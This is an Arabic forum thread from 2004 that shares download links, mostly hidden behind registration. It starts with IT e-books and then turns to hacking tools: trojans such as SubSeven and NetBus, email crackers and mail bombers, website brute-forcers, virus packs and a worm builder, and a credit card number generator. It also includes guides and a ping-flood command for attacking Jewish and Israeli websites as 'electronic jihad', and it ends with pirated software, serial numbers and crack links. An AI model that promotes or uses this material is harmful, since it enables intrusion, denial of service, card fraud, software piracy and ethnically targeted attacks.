ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : الردهات لينكس 9
لغة البرمجه: Linux
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ


** الهاردوير وعتاد الكمبيوتر **

اسم الكتاب : كتاب متميز في عتاد الحاسب
لغة البرمجه: عتاد الحاسب
الـــتـحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : تعلم بدون تعقيد تجميع وصيانة الحاسوب
لغة البرمجه: عتاد الحاسب
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : شرح كامل للقرص الصلب
لغة البرمجه: عتاد الحاسب
الـــتـحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : شرح للعتاد والمعالجات على شكل HTML
لغة البرمجه: عتاد الحاسب
الـــتـحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ


** الشبكات **

اسم الكتاب : مسار الشبكات
لغة البرمجه: CISCO
الـــتـحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : الشبكات
لغة البرمجه: MCSE
الـــتـحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : مذكره في الشبكات
لغة البرمجه: عام
الـتـــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : البوربوينت جديد
لغة البرمجه: عام
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : إعداد البيوس
لغة البرمجه: عام
الـــتـحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : الانترنت
لغة البرمجه: عام
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : إختصارات لوحة المفاتيح
لغة البرمجه: عام
الــــتحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : مرشدك الأمين للتعرف على الذاكرة
لغة البرمجه: عام
الـــتـحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : الحماية في عالم الإنترنت
لغة البرمجه: عام
الـتـــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : مصطلحات الحاسب الألي
لغة البرمجه: عام
الــتــحميـل: Only the registered members can see the link
_________________
Best Regards,
Mahmoud Hany,
Country: Egypt,
Title: IT instructor,
Mobile: 0106354485

View user's profile Send private message
blackwood
Kiddie
Kiddie


Joined: 21 Sep 2004
Posts: 22
Location: Egypt

PostPosted: Thu Nov 18, 2004 1:23 pm Post subject: Continue........... Reply with quoteBack to top
اسم الكتاب : كتاب لشرح برنامج النيرو
لغة البرمجه: عام
الـــتـحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : التصارح في (nix.*)
لغة البرمجه: عام
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : الموسوعة الحاسوبيه
لغة البرمجه: عام
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : الموسوعة الحاسوبيه 2
لغة البرمجه: عام
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : بروتوكولات الــFTP
لغة البرمجه: عام
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : شرح برنامج الوورد
لغة البرمجه: عام
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : شرح برنامج الإكسل
لغة البرمجه: عام
الـتـــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : تحليل البيانات الإحصائية بالإكسل
لغة البرمجه: عام
الـتـــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : التجارة الإلكترونية( جديد)
لغة البرمجه: عام
الـتـــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : شرح برنامج مضاد الفايروس نورتون
لغة البرمجه: عام
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : كتابة موسوعة المنتديات لتعلم كيفية تركيب منتدي
لغة البرمجه: عام
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : شرح برنامج Black Ice
لغة البرمجه: عام
الـــتـحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : شرح برنامج 3D-Effect
لغة البرمجه: عام
الـتـــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : شرح برنامج eBook Workshop لصنع كتب الكترونية
لغة البرمجه: عام
الـتـــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : شرحا لبرنامج التحميل Mass Downloader 2.5
لغة البرمجه: عام
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : شرح برنامج MPEG Eitor
لغة البرمجه: عام
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : شرح برنامج Safe House
لغة البرمجه: عام
الـــتـحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : شرح برنامج ReGet Deluxe لتسريع التحميل والبحث عن البرامج+تحويل شاشة بدء xp إلى 2000 روعة+ برنامج يخبرك بالبرنامج المناسب لأمتداد معين.
لغة البرمجه: عام
الـتـــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : مشاكل الكمبيوتر وحلولها+لمنع المواقع ال***ية anti-porn شرح بالصور+كيف توصل هاردين بجهازك شرح بالصور+شرح بالصور لعملاق الضغط_Wainrar+شرح لفحص توافق directx مع كرت الشاشة
لغة البرمجه: عام
الــتــحميـل: Only the registered members can see the link
التحميل ايضا: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : كيفية عمل صيانة لجهازك من الويندوز+شرح لوحة التحكم الخاصة بويندوز
لغة البرمجه: عام
الــتــحميـل: Only the registered members can see the link
التحميل ايضا: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : كتاب لشرح التسجيل بلايكوس + تركيب منتديات iB
لغة البرمجه: عام
الـــتـحميـل: Only the registered members can see the link
التحميل ايضا: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : كتاب لشرح برنامجSystem Mechanic v4
لغة البرمجه: عام
الـــتـحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : الشرح بالصور لبرنامج التعريب ‎ResHacker+شرح برنامج EO Video لتحويل صيغ الأفلام ونسخه
لغة البرمجه: عام
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : شرح برنامج Throttle لتسريع جميع انواع الاتصال+- شرح كامل لبرنامج الحمايه Norton AntiVirus 2003
لغة البرمجه: عام
الـــتحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : الشرح الكامل لبرنامج النيرو( الاصدار الخامس)+شرح برنامج win fax+شرح Total Recorder الرائع لتسجيل الأصوات
لغة البرمجه: عام
الـــتـحميـل: Only the registered members can see the link
التحميل ايضا: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : شرح برنامج الكلك وكيفية التعامل معه+كيف تنسخ على أقراص 800 - 900 ميغا --؟؟؟
لغة البرمجه: عام
الــتــحميـل: Only the registered members can see the link
التجميل ايضا: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : طريقة نسخ قرص محمي بواسطة ثلاث برامج+شرح مبسط لـ ZoneAlarmPro4 آخر اصدار
لغة البرمجه: عام
الــتــحميـل: Only the registered members can see the link
التحميل ايضا: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : شرح برنامج Easy GIF Animator 2_11 بالتفصيل+شرح وتعريب GifArt's Button Maker 1_1لصنع سمات
لغة البرمجه: عام
الــتــحميـل: Only the registered members can see the link
او Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : شرح برنامج The 911 CD Builder v2_0 الرائع+شرح بالصور للبرنامج الشهير فى البحث copernic
لغة البرمجه: عام
الـتـــحميـل: Only the registered members can see the link
او Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : شرح مفصل كيف تحمل اي برنامج من مكتبة المشاغب بGetRight+شرح برنامج webexe لعمل كتب إلكترونية رائعة
لغة البرمجه: عام
الــتــحميـل: Only the registered members can see the link
او Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : شرح برنامج leap ftp 2_7_2 لنقل الملفات بالصور
لغة البرمجه: عام
الـــتـحميـل: Only the registered members can see the link
او Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : اساسيات الهاردوير
لغة البرمجه: عام
الـــتـحميـل: Only the registered members can see the link
او Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : كتاب يحتوي علي الشرح برنامج AntiPorn لمنع المواقع ال***ية
لغة البرمجه: عام
الــتــحميـل: Only the registered members can see the link
او Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : كتاب يحتوي علي الشرح برنامج Get Data Back لاستعادة الملفات
لغة البرمجه: عام
الـــتـحميـل: Only the registered members can see the link
او Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : كتاب يحتوي علي الشرح برنامج Xing MPEG Encoder لضغط ملفات الفيديو
لغة البرمجه: عام
الـتـــحميـل: Only the registered members can see the link
او Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : كتاب يحتوي علي الشرح برنامج Golden Eye لمراقبة الجهاز اثناء غيابك
لغة البرمجه: عام
الــتــحميـل: Only the registered members can see the link
او Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : برنامج صانع رموز منتديات المشاغب
لغة البرمجه: عام
الــتــحميـل: Only the registered members can see the link
او Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : حوالي 13 كتاب لتعليم الفوتوشوب ودروس عنه
لغة البرمجه: فوتوشوب
الـتـــحميـل: Only the registered members can see the link
================================================== ====

Huge Rare Programs:
--------------------------

برامج الساب سفن
الشرح والتحميل
Only the registered members can see the link

برنامج sub seven GOLD
تحميل البرنامج
Only the registered members can see the link
تعريب البرنامج
Only the registered members can see the link
شرح البرنامج
Only the registered members can see the link


برنامج sub seven BONUS
تحميل
البرمOnly the registered members can see the link
تعريب البرنامج
Only the registered members can see the link
شرح البرنامج
Only the registered members can see the link


برامج النت بيوس
Only the registered members can see the link
شرح النت بيوس
Only the registered members can see the link

برامج لأختراق الأجهزة تجدها هنا
Only the registered members can see the link


أختراق البريدات

برنامج Only the registered members can see the link
التحميل
Only the registered members can see the link
الشرح
Only the registered members can see the link

وبرامج اخرى لأختراق البريد تجدها هنا
Only the registered members can see the link

صفحة اختراق البريد الالكتروني
Only the registered members can see the link


اختراق المواقع

برنامج Only the registered members can see the link
التحميل
Only the registered members can see the link
الشرح1
Only the registered members can see the link
الشرح2
Only the registered members can see the link

برنامج WebCracker4.0
التحميل
Only the registered members can see the link

الشرح
Only the registered members can see the link


برنامج Brutus
التحميل
Only the registered members can see the link
الشرح
Only the registered members can see the link

برنامج Unsecure2.1
التحميل
Only the registered members can see the link

الشرح
Only the registered members can see the link
برامج خاصة بالمواقع تجدها هنا
Only the registered members can see the link

ضرب الايميل

طرق تدمير البريد تجدها هنا
Only the registered members can see the link

طرق تدمير البريد مع البرنامج وبالعربي
Only the registered members can see the link

برنامج Kaboom
Only the registered members can see the link

برنامج Euthan
Only the registered members can see the link

برنامج aenima
Only the registered members can see the link

برنامج upyours4beta3
Only the registered members can see the link******s.nbci.com/hacknowledge/upyours4beta3.zip

برنامج sneaky Mail
Only the registered members can see the link******s.nbci.com/hacknowledge/sneaky.zip

ضرب المواقع

كيف تدمر سيرفرات المواقع اليهودية؟؟ هنا الجواب
Only the registered members can see the link******s//i...ews_servers.htm


برنامج الدرة الحربي للهجوم على المواقع الإسرائيلية ،،
تجده هنا مع الشرح
Only the registered members can see the link

طريقة من طرق تدمير المواقع

افتح الدوس ومن ثم اكتب هذا الامر على سبيل المثال

ping Only the registered members can see the link******x/

بدل الأ**ات اكتب اسم الموقع

تدمير المواقع بدون برامج للتدمير ،، هنا طريقة الشرح
Only the registered members can see the link


سرقة الارقام السرية - الباسورد

BiosHackيخترق عدة انواع من البيوس
Only the registered members can see the link

ARJ ل**ر الـ
Only the registered members can see the link


FTP للبحث فى الشبكة عن
Only the registered members can see the link


لاظهار ما تحت النجوم
Only the registered members can see the link*****

قوائم عد - وورد لست

تستعمل فى بعض المواقع
Only the registered members can see the link

اسماء ذكور
Only the registered members can see the link


اسماء اناث
Only the registered members can see the link


لصناعة قائمة
Only the registered members can see the link


لارقام الديجيتال
Only the registered members can see the link


الفيروسات

،،، أدوات تصنيع الفيروسات ،،،إخطر الفيروسات والكثير
الكثير تجدها هنا // اخواني اخواتي ارجو اخذ الحذر عند
تنزيلها لانها قد تعطب الماذر بورد///

Only the registered members can see the link

ملف يحتوي على 130 فيروس
Only the registered members can see the link

برنامج لصناعة فيروسات (الديدان) مع شرح له
التحميل
Only the registered members can see the link
الشرح
Only the registered members can see the link

مكتبة تحتوى على كتب للتعليم والشرح
Only the registered members can see the link
تحتوي هذه المكتبة على سلسلة من الدروس و الكتب المتعلقة
بتعليم اختراق المواقع و البريد الإلكترني و الأجهزة ..
القسم قيد التطوير و التحديث .. نتمنى لكم حسن القراءة و
التعلم .. كما نسألكم الدعاء لكتاب و ناشري الدروس .. و
الله الموفق .

ملاحظة :- يفضل تنزيل الكتب و الدروس بدون برامج التنزيل
، لأنها قد لا تعمل .


وهنا عشرات الدروس وبالعربية ،، رائعة
Only the registered members can see the link

دروس بالعربية لأختراق المواقع تجدها هنا
Only the registered members can see the link

دروس بالعربية لأختراق الأجهزة تجدها هنا
Only the registered members can see the link

دروس بالعربية لتدمير المواقع تجدها هنا
Only the registered members can see the link

وهنا مجموعة دروس باللغة الأنجليزية
Only the registered members can see the link


انواع الهاكرز
Only the registered members can see the link

بعض التوضيحات والدروس

ماالذي تستطيع فعله لكي تجاهد الكترونيا ؟
Only the registered members can see the link

الاختراق بدون سيرفر - باتش
Only the registered members can see the link


ازالة تروجان برامج الهكرز
Only the registered members can see the link
_________________
Best Regards,
Mahmoud Hany,
Country: Egypt,
Title: IT instructor,
Mobile: 0106354485

View user's profile Send private message
blackwood
Kiddie
Kiddie


Joined: 21 Sep 2004
Posts: 22
Location: Egypt

PostPosted: Thu Nov 18, 2004 1:25 pm Post subject: Continue........... Reply with quoteBack to top
Nuke - نيوك
Only the registered members can see the link


برامج منوعة

" برامج هاكينج عربية " بالاضافة إلى برنامج المجاهد الألكتروني تجدها هنا
Only the registered members can see the link

صنع أرقام الفيزا
Only the registered members can see the link

برنامج مجاهدين النت ، برنامج عربي ،، وصلات التحميل في الأسفل

Only the registered members can see the link

Only the registered members can see the link*****


يرامج الأتصال والمحادثة

mIRC (32-bit) v5.91t
ftp://ftp.dal.net/dalnet/clients/mirc/mirc591t.exe
Name: Dhafer Al-holaisi
s/n: 15448-1432890
برنامج الشات الشهير


Gooey 2.1
Only the registered members can see the link
نسخة أحدث للتحدث مع زائري الموقع الذي تتصفحه


PalTalk v3.5 build 344
Only the registered members can see the link
برنامج أنيق للمحادثة بالصوت والكلام عبر الإنترنت


Microsoft Chat v2.9
Only the registered members can see the link
برنامج دردشة من ميكروسوفت معرب


برامج خدمية للجهاز والأنترنت


WinZip8 Final
ftp://ftp.download.com/pub/ppd/winzip80.exe
Name: Dhafer Al-holaisi
s/n: 85143383
البرنامج الشهير لفك الملفات المضغوطة


WinRAR v2.80
Only the registered members can see the link
برنامج آخر أقل شهره من Win zip لفك الملفات المضغوطة


Shut Down Timer
Only the registered members can see the link
برنامج يطفئ جهاز الكمبيوتر فى الساعة النى تحددها له


WebFerret v3.02
ftp://zdftp.zdnet.com/pub/private/s...sers/wferet.exe
نسخة كاملة للبحث السريع عن أي معلومة داخل الإنترنت


Pal 1.6a
Only the registered members can see the link
لحماية جهازك من الكوكيز الغير مرغوب في زرعه
Name: Dhafer Al-holaisi
s/n: 3335201


Advanced dialer v2.4
ftp://zdftp.zdnet.com/pub/private/s...ools/advdlr.zip
يقوم بحساب الوقت والتاريخ الذي أتصلت فيه بالانترنت خلال الشهر


CD-R Win v4.0a
ftp://ftp.cdarchive.com/pub/goldenh...ad/cdr40a-e.exe
Name: Dhafer Al-holaisis
CompanyE-mail: abuturky
ulockkey: CB59A206-7F8D8D1A-A38BFFCA-FB7B879E
checkkey:30222598-B4D42F1C-DC0672D0-58F07854
برنامج مشهور ورديف للكلون لنسخ السيدي والسيدي المحمي


Part it 2.03
4Windows 9x/NT/ME
Only the registered members can see the link
Name: dhafer
s/n: PRT-F1B9A337-65C06874-6
عمله تجزئة الملفات الكبيرة لنسخها على أقراص فلوبي وسهولة إستعادتها


PortFlash v2.0
Only the registered members can see the link
يمسح خطواتك فى الأنترنت


WinFax Pro v10 full
Only the registered members can see the link
ftp://63.124.222.11/.tmpD/.%20thede...%20Pro%2010.zip
: Only the registered members can see the link


Mail Alert
Only the registered members can see the link
لإخبارك بوجود رسائل بريدية لإستقبالها


برامج التصفح وتصميم المواقع

FrontPage98 , Size (25M)
Only the registered members can see the link
s/n: 11121111111


WebStyle v2.0
Only the registered members can see the link
برنامج رسومي لتصميم العناوين والأزرار لصفحات الإنترنت
unlock code: 1234567
الكراك: Only the registered members can see the link


Smart Explorer v4.8
Only the registered members can see the link
نسخة كاملة متصفح صغير وذكي به كل الخيارات الضرورية
Name: craig stroup
s/n: 1023105344
الأحدث
Smart Explorer v4.9
Only the registered members can see the link
نسخة كاملة متصفح صغير وذكي به كل الخيارات
Name: Abuturky_Dhafer Al-holaisi
s/n: 965277253
أو
User: Steven Kern s/n: 736191262


DreamWaver4
Only the registered members can see the link
برنامج قوي ومتكامل لتحرير صفحات الإنترنت مع دعمه للعربية لاتسجله وانت
متصل بالإنترنت
s/n: DWW400-03771-57289-73501


HomeSite v4.52
Only the registered members can see the link
نسخة كاملة محرر صفحات انترنت سريع وقوي نظام ويزويج ويدعم العربية
Name : Anything
s/n: HS45EE-5030480010

نفس البرنامج السابق مع الكثير من الميزات الأخرى
Directory Snoop 3.14
ftp://zdftp.zdnet.com/pub/private/s...ties/dirsnp.zip


ويعمل مع الملفات العربيةFormat لإستعادة الملف من الأماكن المعطوبة بسبب فيروس ما أو تهيئة
Final Data v1.0
Only the registered members can see the link
كراك:Only the registered members can see the link


وهذا البرنامج لحذف الملفات ولن يمكن إسعادتها فيما بعد بالطرق السابقة
Eraser v4.11
ftp://zdftp.zdnet.com/pub/private/s...es/eraserfl.zip


برنامج لإسترجاع البيانات بعد مسح الجهاز
Norton Ghost2002
Only the registered members can see the link


برنامج لإدارة البيانات والقيام بالعمليات على الملفات
Norton_Utilities2001
ftp://ftp.download.com/pub/win95/ut...200_5.0_618.exe
s/n: 07-31-90069-NL


هذا البرنامج لفك ضغط الملفات المضغوطة وهو يفك ما يلي
zip, cab, rar, lha, uue, xxe
CoolZIPv 1.01
Only the registered members can see the link
كراك:Only the registered members can see the link


برنامج صغير لفك الضغط
winrar v2.8
Only the registered members can see the link
كراك:Only the registered members can see the link


برنامج لضغط وفك ضغط الملفات ويدعم جميع اللواحق المعروفة
ZipAll
Only the registered members can see the link


برنامج يضغط لملفات
Easy Zip 2000 v 4.6
Only the registered members can see the link


يشفر الملفات بكلمات سر لا تفتح بدونها
Secret
ftp://ftp.symantec.com/misc/nss.exe


برنامج لتشفير الملفات والمجلدات وهو الأقوى بين الربامج
ddCrypt v. 1.4
Only the registered members can see the link


حماية الملفات بكلمات سرية تختارها أنت لا تفتح بدونها
Norton Secret Stuff v1.0
Only the registered members can see the link


هذا البرنامج يستعيد الملفات الخاصة ببرنامج الوورد حصراً التالفة
Word Recovery v1.0.1
ftp://zdftp.zdnet.com/pub/private/s...ng/wordrecv.zip


برامج صيانة
مسرع للألعاب داخل الكمبيوتر وهو برنامج عملي جداً
SciTech Display Doctor
ftp://ftp.scitechsoft.com/sdd/sdd653.exe
Name: CoKeBoTtLe99 R/ 20000-529D848E-00000


هذا البرنامج يعطي تقريراً مفصلاً عن قطع الكمبيوتر وأداؤها لمعرفة أين العطل بالتحديد
SiSoft Sandra 2001se Pro
Only the registered members can see the link


هذا البرنامج يفحص نوع كمبيوترك ويعطيك سرعته الحقيقية
ShowMHZ
Only the registered members can see the link


انسخ ملفات نظام الويندوز للقرص وأضف إليه هذه الملفات بعد فك ضغطها وإترك الباقي عليه إذ يعرف السيدي ومن ثم يقوم بإنزال الويندوز مباشرة وبدون وقفة
Starter
Only the registered members can see the link


هذا البرنامج لتصفح الريجيستري
StartEd 3.80
ftp://ftp.uni-hamburg.de/pub/os/win...til/started.zip


هذا البرنامج لصيانة الريجيستري
RegCleaner v3.4
Only the registered members can see the link


كثيراً ما يتلف سيدي مهم بسبب أو بآخر ويكون عليه ملفات مهمة هذا البرنامج لإنقاذ الملفات
CDR-Diagnostic 1.6.4
Only the registered members can see the link


نفس البرنامج السابق لكي ينقذ الملفات من السيدي التالف
BadCopy 99 v2.0
Only the registered members can see the link
Name: Dhafer Al-holaisi s/n: 405419


برنامج لصيانة كافة أجزاء الكمبيوتر ويجعل البرامج تعمل بشكل أسرع لا تستهان بقوة هذا البرنامج
System Mechanic v3.6e
ftp://ftp1.iolohost.com/system_mechanic.exe
Name: Abuturky s/n: 83866-ST954-0776755445


برنامج لتسريع أداء الويندوز بشكل عام وتسريع عمل الملحقات
Power Tools v2.85
Only the registered members can see the link
s/n: b87d789wnfijwefh87eyf87h


يعرض لك أنواع القطع الموجودة في جهازك بالإضافة إلى درجة حرارة المعالج والذاكرة المؤقته
CPUCooL v6.2.2
Only the registered members can see the link
s/n: 10983040


تسريع جهاز الكمبيوتر بمعالجة وترتيب ذاكرة الكاش إنه برنامج عملي ومفيد
Cacheman 5.0
Only the registered members can see the link
s/n: 322_11_222_9


ينظف هذا البرنامج الهارد من الملفات المهملة ويقوم بإزالة البرامج العالقة التي ليس بها خاصية UnInstall الحذف أي التي ليس معها برنامج
Norton CleanSweep
Only the registered members can see the link


هذا البرنامج ينظم عمل الذاكرة ويديرها ويبين كم إستخدمت منها وهو مفيد
RAM Idle SE v2.6
Only the registered members can see the link


يقوم هذا البرنامج بالتخفيف عن الذاكرة بالتقليل من حمولتها كما تستطيع عمل ذلك بنفسك أو تتركه للبرنامج ليقوم بهذا العمل مما يؤدي إلى أداء ممتاز للجهاز
FreeMem Professional
ftp://zdftp.zdnet.com/pub/private/s...es/fremem32.zip
s/n: 235612617935


تنظيم عمل الذاكرة وإنقاذها قبل أن تمتلئ تماماً وتؤدي إلى عمليات ممنوعة
MemWatcher v3.0.2
Only the registered members can see the link


في كثير من الأحيان وعند إغلاق برنامج ما فإنه يبقى عالقاً في الذاكرة مما يؤدي إلى تزاحم وإبطاء أداء وعمل الجهاز والحل هو هذا البرنامج ننصح به بشدة
Memory Cleaner v2.4.02
Only the registered members can see the link


هذا البرنامج يعطيك تقريراً كاملاً ومفصلاً عن كل شئ في الكمبيوتر
Sys check
Only the registered members can see the link


هذا البرنامج يقوم بفحص الملفات الموجودة في مجلد النظام لديك ويقوم بفرز الملفات التي لم يعد لها عمل نهائياً ومن ثم يقوم بحذفها ولكن بعد سؤالك وأخذ إذنك طبعاً
Clean System Directory
Only the registered members can see the link


برنامج لتقسيم الهارد وتجزئته من شركو ويسترن ديجيتال وهو النسخة الحديثة منه تعمل مع ويندوز مهما كانت نسخته
EZ-drive
Only the registered members can see the link


برنامج لتحرير الصفحات وبه قوالب جاهزة يدعم الجافا
PageBuilder v 3.0c
Only the registered members can see the link
كراك:Only the registered members can see the link


يدعم اللغة العربية والجافاوأنصح به بشدة
Aceexpert v3.02i
ftp://zdftp.zdnet.com/pub/private/s...ls/acexpert.exe
Name: C0Ke2000 s/n: E8VN-2Z3Q-PWZC-LHN1


وهو برنامج للتصميم السريع ويدعم الجافا كما أنه يحوي على متصفح داخلي
Alex's HTML Editor v1.1
ftp://zdftp.zdnet.com/pub/private/s...ls/alexhtml.zip


أيضا محرر صفحات سريع وعملي ويدعم اللغة العربية
HomeSite v4.52
Only the registered members can see the link
s/n: HS45EE-5030480010


محرر لكتابة ملفات السي جي أي التي يمكن أن تقوم من خلالها ببرمجة العديد من الأمور المبهمة مثل دفتر الزوار والمنتديات الحوارية
Perl Code Editor
Only the registered members can see the link


تستطيع بواسطة هذا البرنامج إنشاء ما يسمى المساعدة لبرنامج ما عن طريق صفحات الوب
Microsoft HTML Help
Only the registered members can see the link


برنامج ترير صفحات الإنترنت بالإضافة إلى وجود قوالب جافا جاهزة فقط ركب
Webford v2.1
Only the registered members can see the link


لتصميم الأزرار بلغة الجافا مع إعطائها جميع أنواع التأثيرات
JavaScript Buttons
Only the registered members can see the link


لتصميم القوائم بلغة الجافا
JavaScript Menu
Only the registered members can see the link


تصميم أزرار الجافا الذهبية
Applet Button Factory v5.0
ftp://ftp.blackdomino.com/pub/applet50.exe
كراك:Only the registered members can see the link
Name: 12aew s/n: 9j8f5


تصميم أزرار وعناوين لصفحات الويب
WebStyle1.2
ftp://onyx.xara.net/pub/xaraltd/style110.exe
كراك:Only the registered members can see the link


HTML Java Visual basic محرر صفحات
Scribbler 2000 v1.9.1
Only the registered members can see the link
Name: DSCeNe 2000 Code: 0dE98202555f2454


برامج محادثة
إنه برنامج محادثة جميل جداً يتميز بوجود صور معبرة عن كل جملة من الجمل
Microsoft Chat 2.5A
Only the registered members can see the link


برنامج محادثة ذكي يجب أن تجربه لكي ترى بأنه ليس ضروري أن تكن مشتركاً لتتحدث
AOL Messenger
Only the registered members can see the link


تستطيع أن تتحاور من زوار الوقع الذي أنت فيه الآن أي الذين يشلركونك بتصفح موقع ما ولكن مشكلته بأنه يجب أن يكون هذا البرنامج موجود لدى جميع المتحدثين
Gooey 2
Only the registered members can see the link


برنامج لتبادل الملفات والمحاورة بالكتابو والصوت والصورة
Messenger
ftp://ftp.uni-stuttgart.de/pub/syst...t/messenger.zip


وهو برنامج رائع للمحادثة ويعتمد على حساب الهوتميل
MSN Messenger v3.5
Only the registered members can see the link


برنامج للدردشة باللغة العربية
Odigo Messenger v2.5
Only the registered members can see the link


نفس البرنامج السابق ولكن هذه النسخة الإنكليزية فقط
Odigo Messenger v3.0
Only the registered members can see the link


هاتف أنيق للإتصال عبر الإنترنت ولكن ليس مع هاتف إنما مع طرف آخر عنده نفس البرنامج
MediaRing Talk
Only the registered members can see the link


برنامج جيد للمحادثة يجب أن تفتح حساب عندهم أيضا
Get Firtalk
Only the registered members can see the link


للمحادثة بالصوت والكلام
PalTalk v3.5
Only the registered members can see the link


برنامج دردشة عملي وصغير وبسيط جداً
Fun Chat v2.0
Only the registered members can see the link


برنامج كامل الوظائف للمحادثة والدردشة
CheetaChat v6.3.22
ftp://ftp.zdnet.com/pub/private/sWl...rc/cchatful.exe


محادثة صوت وصورة وكاميرا ويب
Iris Phone v3.0
Only the registered members can see the link
كراك:Only the registered members can see the link
